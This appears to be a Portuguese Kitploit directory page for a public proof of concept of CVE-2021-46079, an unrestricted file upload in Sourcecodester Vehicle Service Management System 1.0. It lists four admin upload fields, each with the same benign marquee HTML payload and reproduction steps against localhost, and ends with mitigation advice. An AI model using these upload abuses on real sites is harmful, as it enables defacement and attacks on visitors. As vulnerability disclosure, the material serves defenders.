Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection — CVE-2021-46079 - Uma vulnerabilidade de upload de arquivos sem restrições existe no Sourcecodester Vehicle Service Management System 1.0. Um atacante remoto pode enviar arquivos maliciosos, levando à Injeção de HTML. | Kitploit
Ferramentas/GitHubGitHub/sanupl/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubsanupl/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection

Vehicle-Service-Management-System-Multiple-File-upload-Leads-to-Html-Injection

CVE-2021-46079 - Uma vulnerabilidade de upload de arquivos sem restrições existe no Sourcecodester Vehicle Service Management System 1.0. Um atacante remoto pode enviar arquivos maliciosos, levando à Injeção de HTML.

Ver Repositório
há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-46079

Título do Exploit: Vehicle Service Management System - Upload de 'múltiplos' arquivos leva à Injeção de HTML

Autor do Exploit: SANU P.L

CVE: CVE-2021-46079

CVSS: 7.2 ALTO

Referências:

  • https://www.plsanu.com/vehicle-service-management-system-multiple-file-upload-leads-to-html-injection
  • https://nvd.nist.gov/vuln/detail/CVE-2021-46079
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46079

Descrição:

Existe uma vulnerabilidade de upload de arquivo sem restrições no Sourcecodester Vehicle Service Management System 1.0. Um atacante remoto pode enviar arquivos maliciosos, levando à Injeção de HTML.

1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)

Exploit:

  1. Acesse o painel administrativo http://localhost/vehicle_service/admin
  2. Navegue até a seção My Account http://localhost/vehicle_service/admin/?page=user

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Salve o código html acima, por exemplo: Html Injection.html
  2. Na seção My Account, preencha todos os detalhes necessários e selecione o arquivo html no campo Avatar.
  3. Clique no botão update.
  4. Abra a imagem do avatar em uma nova aba.
  5. A Injeção de HTML é executada.

2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)

Exploit:

  1. Acesse o painel administrativo http://localhost/vehicle_service/admin
  2. Navegue até a seção User List e clique no botão Create New.

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Salve o código html acima, por exemplo: Html Injection.html
  2. Na página Create New User, preencha todos os detalhes necessários e selecione o arquivo html no campo Avatar.
  3. Clique no botão Save.
  4. Abra a imagem do avatar em uma nova aba.
  5. A Injeção de HTML é executada.

3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)

Payload:

  1. Acesse o painel administrativo http://localhost/vehicle_service/admin
  2. Navegue até a seção Settings http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Salve o código html acima, por exemplo: Html Injection.html
  2. Na seção Settings, preencha todos os detalhes necessários e selecione o arquivo html no campo System Logo.
  3. Clique no botão update.
  4. Abra a imagem do System Logo em uma nova aba.
  5. A Injeção de HTML é executada.

4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)

Exploit:

  1. Acesse o painel administrativo http://localhost/vehicle_service/admin
  2. Navegue até a seção Settings http://localhost/vehicle_service/admin/?page=system_info

Payload:

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
<title>HTML marquee Tag</title>
</head>
<body>
<marquee>HTML INJECTION</marquee>
</body>
</html>
  1. Salve o código html acima, por exemplo: Html Injection.html
  2. Na seção Settings, preencha todos os detalhes necessários e selecione o arquivo html no campo Website Cover.
  3. Clique no botão update.
  4. Abra a imagem do Website Cover em uma nova aba.
  5. A Injeção de HTML é executada.

Impacto:

Um atacante pode enviar arquivos maliciosos em vários endpoints, o que leva à Injeção de HTML.

Mitigação:

Recomenda-se implementar o seguinte:

  • Nunca aceite um nome de arquivo e sua extensão diretamente sem ter um filtro de lista de permissões.
  • Se não houver necessidade de caracteres Unicode, é altamente recomendável aceitar apenas caracteres alfanuméricos e apenas um ponto como entrada para o nome do arquivo e a extensão.
  • Limite o tamanho do arquivo a um valor máximo para prevenir ataques de negação de serviço.
  • O diretório de upload não deve ter permissão de "execução".
  • Não confie apenas na validação do lado do cliente.
Baixar ferramenta